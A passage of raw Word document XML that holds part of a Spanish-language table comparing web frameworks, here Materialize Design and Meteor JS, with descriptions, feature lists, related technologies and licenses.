          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Materialize Design</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C0926EF" wp14:editId="16276C3A">
                  <wp:extent cx="2819500" cy="1878247"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="55" name="Imagen 55" descr="Resultado de imagen para materialize desig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materialize design logo"/>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821946" cy="1879876"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00081D6F" w:rsidRDefault="00DE74BD" w:rsidP="00081D6F">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00081D6F">
              <w:t xml:space="preserve">Material design es un concepto, una filosofía, un lenguaje de diseño con pautas enfocadas al diseño utilizado en la UI de Android, pero también para la web y en cualquier plataforma, se trata de un diseño más limpio en el que predominan animaciones y transiciones de respuesta, el relleno y los efectos de profundidad tales como la iluminación y las sombras. </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Fácil manejo </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Permite crear interfaces que se adapten a distintas resoluciones y navegadores.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Crea animaciones con filosofía Material Design.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Crea un menú lateral abierto.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>También integra Parallax, Pushpin y scrollspy, con el único objetivo de que el diseño sea más atractivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>JAVASCRIPT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>CSS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>SASS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MIT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">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4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Meteor JS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="016FB8E7" wp14:editId="36152280">
                  <wp:extent cx="3253655" cy="693683"/>
                  <wp:effectExtent l="0" t="0" r="444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4">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:srcRect t="30474" b="31117"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3260689" cy="695183"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:extLst>
                            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                            </a:ext>
                          </a:extLst>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Meteor es una plataforma de open source para la web, móvil y escritorio.  Es un framework para aplicaciones web con JavaScript. Meteor funciona con un rendereo reactivo en donde se integra Angular JS y React JS o el framework Blaze</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Las aplicaciones son en tiempo real</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Todo es con un único lenguaje:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Smart Packages</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Soporte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>NODE JS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>NPM</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>JAVASCRIPT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ANGULAR</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>REACT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>BLADE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>VUE JS</w:t>
            </w:r>
          </w:p>
